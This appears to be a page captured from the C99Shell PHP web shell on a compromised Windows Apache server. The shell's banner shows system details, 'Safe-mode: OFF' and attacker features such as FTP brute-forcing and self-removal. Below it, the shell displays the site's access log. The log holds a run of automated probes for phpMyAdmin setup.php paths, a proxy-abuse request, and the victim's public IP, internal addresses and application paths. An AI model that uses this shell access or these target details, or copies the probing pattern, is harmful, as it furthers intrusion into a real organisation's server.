!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.04.12.log (4.5 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
216.245.221.92 - - [12/Apr/2023:00:00:18 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.219 - - [12/Apr/2023:00:01:05 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [11/Apr/2023:23:59:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:00:00:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
172.22.2.4 - - [12/Apr/2023:00:03:29 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [12/Apr/2023:00:04:01 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [12/Apr/2023:00:04:21 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [12/Apr/2023:00:04:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.70.207 - - [12/Apr/2023:00:05:11 -0500] "-" 408 -
216.245.221.92 - - [12/Apr/2023:00:05:17 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Apr/2023:00:05:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [12/Apr/2023:00:06:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:00:06:47 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
52.167.144.63 - - [12/Apr/2023:00:06:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/0218.pdf HTTP/1.1" 200 398941
152.61.192.232 - - [12/Apr/2023:00:07:25 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [12/Apr/2023:00:05:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [12/Apr/2023:00:07:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:00:06:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
201.245.192.253 - - [12/Apr/2023:00:08:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:00:09:28 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [12/Apr/2023:00:09:52 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
216.245.221.92 - - [12/Apr/2023:00:10:17 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.207 - - [12/Apr/2023:00:11:05 -0500] "-" 408 -
34.90.16.100 - - [12/Apr/2023:00:11:26 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [12/Apr/2023:00:11:47 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
35.204.221.1 - - [12/Apr/2023:00:12:43 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
47.246.164.151 - - [12/Apr/2023:00:13:01 -0500] "GET /galeria/galeria/fotos/Humedal-Vaca3P.jpg HTTP/1.1" 200 38460
172.22.2.4 - - [12/Apr/2023:00:11:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [12/Apr/2023:00:13:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.70.177 - - [12/Apr/2023:00:14:04 -0500] "-" 408 -
172.22.2.4 - - [12/Apr/2023:00:12:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
172.22.2.4 - - [12/Apr/2023:00:14:31 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
34.147.78.116 - - [12/Apr/2023:00:14:45 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [12/Apr/2023:00:15:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:00:15:52 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
66.249.70.207 - - [12/Apr/2023:00:16:50 -0500] "-" 408 -
201.245.192.253 - - [12/Apr/2023:00:18:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:00:17:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:00:19:34 -0500] "GET /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 8615
201.245.192.253 - - [12/Apr/2023:00:19:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42829
201.245.192.253 - - [12/Apr/2023:00:19:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43165
172.22.2.4 - - [12/Apr/2023:00:18:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
34.141.162.119 - - [12/Apr/2023:00:20:12 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
193.35.18.12 - - [12/Apr/2023:00:20:16 -0500] "GET http://ip-api.com/json/190.27.245.106 HTTP/1.1" 404 1014
216.245.221.92 - - [12/Apr/2023:00:20:17 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.207 - - [12/Apr/2023:00:22:39 -0500] "-" 408 -
201.245.192.253 - - [12/Apr/2023:00:23:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
52.167.144.144 - - [12/Apr/2023:00:24:23 -0500] "GET /alerta-fase-1-distrito-incrementa-operativos-de-control-a-las-emisiones-de-los-vehiculos.html HTTP/1.1" 200 956
172.22.2.4 - - [12/Apr/2023:00:23:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [12/Apr/2023:00:25:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:00:24:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
114.119.152.97 - - [12/Apr/2023:00:27:08 -0500] "-" 408 -
52.167.144.30 - - [12/Apr/2023:00:28:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/5402.pdf HTTP/1.1" 304 -
66.249.70.207 - - [12/Apr/2023:00:28:22 -0500] "-" 408 -
201.245.192.253 - - [12/Apr/2023:00:28:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [12/Apr/2023:00:29:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42829
201.245.192.253 - - [12/Apr/2023:00:29:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43165
216.245.221.92 - - [12/Apr/2023:00:30:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:00:29:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:00:29:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55211
157.55.39.219 - - [12/Apr/2023:00:32:28 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
152.61.128.50 - - [12/Apr/2023:00:32:58 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [12/Apr/2023:00:33:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
121.30.179.59 - - [12/Apr/2023:00:34:29 -0500] "GET /BLA/boletinlegal/Circulares/2009/Circular%20Instructiva%20-%20Memorando%202009IE24363.pdf HTTP/1.1" 200 1544636
121.30.179.149 - - [12/Apr/2023:00:34:29 -0500] "GET /BLA/boletinlegal/Circulares/2010/Circular%2005%20de%208%20de%20septiembre%20de%202010.pdf HTTP/1.1" 200 2146608
121.30.179.109 - - [12/Apr/2023:00:34:29 -0500] "GET /BLA/boletinlegal/Circulares/2017/Circular%20No.%201%20del%2030%20de%20Marzo%20de%202017.pdf HTTP/1.1" 200 668532
121.30.179.9 - - [12/Apr/2023:00:34:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1042.pdf HTTP/1.1" 200 486040
121.30.179.119 - - [12/Apr/2023:00:34:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1054.pdf HTTP/1.1" 200 487632
121.30.179.159 - - [12/Apr/2023:00:34:29 -0500] "GET /transparencia/directorioservidores/MANUAL%20DE%20FUNCIONES%2002666%20DEL%204-DIC-2015.pdf HTTP/1.1" 200 52098444
121.30.179.19 - - [12/Apr/2023:00:34:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0520.pdf HTTP/1.1" 200 407112
121.30.179.149 - - [12/Apr/2023:00:34:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1197.pdf HTTP/1.1" 200 1787007
66.249.70.207 - - [12/Apr/2023:00:34:30 -0500] "-" 408 -
216.245.221.92 - - [12/Apr/2023:00:35:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:00:34:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
5.153.237.184 - - [12/Apr/2023:00:36:50 -0500] "GET /caminatas-ecologicas-en-bogota-inscribete-y-participa-en-los-recorridos-de-abril.html HTTP/1.1" 200 868
172.22.2.4 - - [12/Apr/2023:00:35:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
193.32.162.159 - - [12/Apr/2023:00:37:55 -0500] "GET / HTTP/1.1" 200 319
193.32.162.159 - - [12/Apr/2023:00:38:05 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
201.245.192.253 - - [12/Apr/2023:00:38:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
40.77.167.94 - - [12/Apr/2023:00:39:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/3966.pdf HTTP/1.1" 304 -
201.245.192.253 - - [12/Apr/2023:00:39:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42829
201.245.192.253 - - [12/Apr/2023:00:39:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43165
216.245.221.92 - - [12/Apr/2023:00:40:17 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.207 - - [12/Apr/2023:00:41:05 -0500] "-" 408 -
172.22.2.4 - - [12/Apr/2023:00:40:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:00:41:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53551
157.55.39.219 - - [12/Apr/2023:00:43:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/1600.pdf HTTP/1.1" 304 -
201.245.192.253 - - [12/Apr/2023:00:43:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.84.21.166 - - [12/Apr/2023:00:43:49 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.21.166 - - [12/Apr/2023:00:43:50 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12191
186.84.21.166 - - [12/Apr/2023:00:43:50 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.84.21.166 - - [12/Apr/2023:00:43:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.166 - - [12/Apr/2023:00:43:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.166 - - [12/Apr/2023:00:43:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.166 - - [12/Apr/2023:00:43:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.166 - - [12/Apr/2023:00:43:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.166 - - [12/Apr/2023:00:43:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.84.21.166 - - [12/Apr/2023:00:43:50 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
172.22.2.4 - - [12/Apr/2023:00:44:33 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-693-12.docx HTTP/1.1" 200 25737
216.245.221.92 - - [12/Apr/2023:00:45:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:00:46:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [12/Apr/2023:00:48:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:00:47:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
186.84.90.37 - - [12/Apr/2023:00:50:06 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
186.84.90.37 - - [12/Apr/2023:00:50:06 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
186.84.90.37 - - [12/Apr/2023:00:50:06 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
216.245.221.92 - - [12/Apr/2023:00:50:17 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.120 - - [11/Apr/2023:23:11:37 -0500] "GET /portaldeninos/parque-mirador-de-los-nevados/ HTTP/1.1" 502 1227
152.61.192.232 - - [12/Apr/2023:00:51:37 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [12/Apr/2023:00:51:39 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [12/Apr/2023:00:51:39 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
201.245.192.253 - - [12/Apr/2023:00:53:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:00:52:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:00:53:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
216.245.221.92 - - [12/Apr/2023:00:55:17 -0500] "HEAD / HTTP/1.1" 200 -
194.233.82.210 - - [12/Apr/2023:00:55:53 -0500] "GET /phpmyadmin/index.php HTTP/1.1" 403 1168
66.249.70.172 - - [12/Apr/2023:00:57:05 -0500] "-" 408 -
118.184.177.27 - - [12/Apr/2023:00:57:58 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [12/Apr/2023:00:58:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
51.161.117.63 - - [12/Apr/2023:00:59:27 -0500] "GET /bogota-region-unidos-por-la-proteccion-y-el-cuidado-del-agua.html HTTP/1.1" 200 824
185.189.182.234 - - [12/Apr/2023:00:59:34 -0500] "GET / HTTP/1.1" 400 946
172.22.2.4 - - [12/Apr/2023:00:58:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [12/Apr/2023:01:00:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:00:59:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54798
172.22.2.4 - - [12/Apr/2023:01:01:19 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17573
172.22.2.4 - - [12/Apr/2023:01:01:33 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [12/Apr/2023:01:01:37 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [12/Apr/2023:01:01:38 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
52.167.144.60 - - [12/Apr/2023:01:02:07 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.207 - - [12/Apr/2023:01:02:49 -0500] "-" 408 -
168.119.253.69 - - [12/Apr/2023:01:03:05 -0500] "GET / HTTP/1.1" 200 319
168.119.253.69 - - [12/Apr/2023:01:03:06 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [12/Apr/2023:01:03:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Apr/2023:01:02:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
216.245.221.92 - - [12/Apr/2023:01:05:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:01:04:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/pma/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin3/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpmanager/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpmyadmin/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/dbadmin/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/admin/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.10.2/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/mysql/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/webadmin/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpma/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.10.3/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/myadmin/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/sqlweb/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/admin/pma/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.11.4/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.11.7/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.11.9.2/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.11.0/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/php/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/websql/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin-2.11.3/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/SQL/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/db/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 1018
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 403 1165
47.106.210.38 - - [12/Apr/2023:01:05:54 -0500] "GET http://190.27.245.106:80/webdb/scripts/setup.php HTTP/1.0" 404 1018
172.22.2.4 - - [12/Apr/2023:01:04:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
201.245.192.253 - - [12/Apr/2023:01:08:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Apr/2023:01:10:17 -0500] "HEAD / HTTP/1.1" 200 -
173.252.107.16 - - [12/Apr/2023:01:11:20 -0500] "GET /images/Sello%201%20JA-2.jpeg HTTP/1.1" 200 42236
172.22.2.4 - - [12/Apr/2023:01:09:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:01:10:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
66.249.70.207 - - [12/Apr/2023:01:13:24 -0500] "-" 408 -
201.245.192.253 - - [12/Apr/2023:01:13:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
157.55.39.223 - - [12/Apr/2023:01:14:16 -0500] "-" 408 -
216.245.221.92 - - [12/Apr/2023:01:15:17 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:01:15:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Apr/2023:01:16:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59646
201.245.192.253 - - [12/Apr/2023:01:18:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [12/Apr/2023:01:19:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42343
201.245.192.253 - - [12/Apr/2023:01:19:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42857
186.31.57.93 - - [12/Apr/2023:01:19:57 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19e0JHTfxi5ihWAzRVjdVHCW0y0YW0HNmttwtLxdOK7bmygLYx5ADUN6HDwAsgmUqCGkWGbgp4TegdiwxP497xjvP2r2n/cTl9xptahREmrLnJOAWnsawf3IotMJINyd2mCb361Fyj2MhV3ly5YOd2N/UhsHfNZMJlsxf6ufGonDaDFwQXJkEuzF+dpNSXjPESiv2f+wJWcToMeDmrM2F4lQAc3afDz0x+OmZ4Yvtm5JGcWTZwOIeG3f1Xr7+gKhkrxtw7j8kZHxg==&u=U2FsdGVkX1/iDehGknpy6Ly2FhIWysdci2osFul5U4VCqovWX8QeKa6IRsX8w1eR&y=U2FsdGVkX1+sYb8Ej5xc3dbXHk8Mk9w252ETnoDzEh6kqQcq9M87HgUeT9iUnkrV HTTP/1.1" 200 26
186.31.57.93 - - [12/Apr/2023:01:19:58 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+jIzNCUFAlLinjQP9+dmFrXS6K0LK2SSHZ8GyiGcu2UWjxUnTZQ70U/Dz3OFhwKKhVEY96L+ZCdrqO8iUpTuUwWe1u5N/01UE3384X0wv7LyqnX5uE4+jLri41yl1IaXLxZc7qnjli4a1AUtINYXTE4knNXHJkXfA2q6j+Kk01oUmu9INxlnID2wdCHfgBqGzwvZnGI77n1Hx5Vc3IHzt/vNitSUK/mQha0OKz+N3/KBMgsSf1O1KnygxIeNpZ2rz4U1FAWaElNXNQG7BqajBjfcZd1Hurh3OxufPqRDXYtw4+6O0AqqachOCCMgBEzHFH/rOC2O9KGMaNB62SGynzOVvX+jb4+Isdk60BL7bbjH1XpP32cye/nBU18qmhglBu0P8La1y1y823pfdb9IBm2hfwC5G14Yb6aHoTzXdDZ2Yd+Vy4BTmZA10gN9LLu+B8dXG1zwOIlnUQZ78OUQwOmKAgxC2fFGeFJY2gnaauY0uY3vocEeNKOCm1yMu5Nm8ujrC62TCT8DjUd7k4zZCsWHjZUiQHN7LLom3sBfTtnnIdS0lgMUnxTeRIu8v5t8axvQb08fzXjXMTyWiF1fAQAigTIazu0nzGsHIeJEEw0jiCaBFDxU4H+wmdhmSz927aa827NdxGoj0SJpD7UlzWpB5rFsrh48Vz4PZCw2uUqXBWLBAnYZ80n2F5N3qOBl//mJfUP4RzVCac3DuumO3hCRHkqjTVnTA4gep97iFsmNmgB4CiTeqXhYxQ6CTyOeqOmdD2SLJtrjqJMBefB6smhEKc1zW0O/ZMoi+LhueUaA1UfjnEwpaFGDz+WAfkkJOU+63THbUyugvrmxw72x+xAsvBfUlslnKkJ+lYh6k20zuu19/I2PXWB7bGmEGMGOq9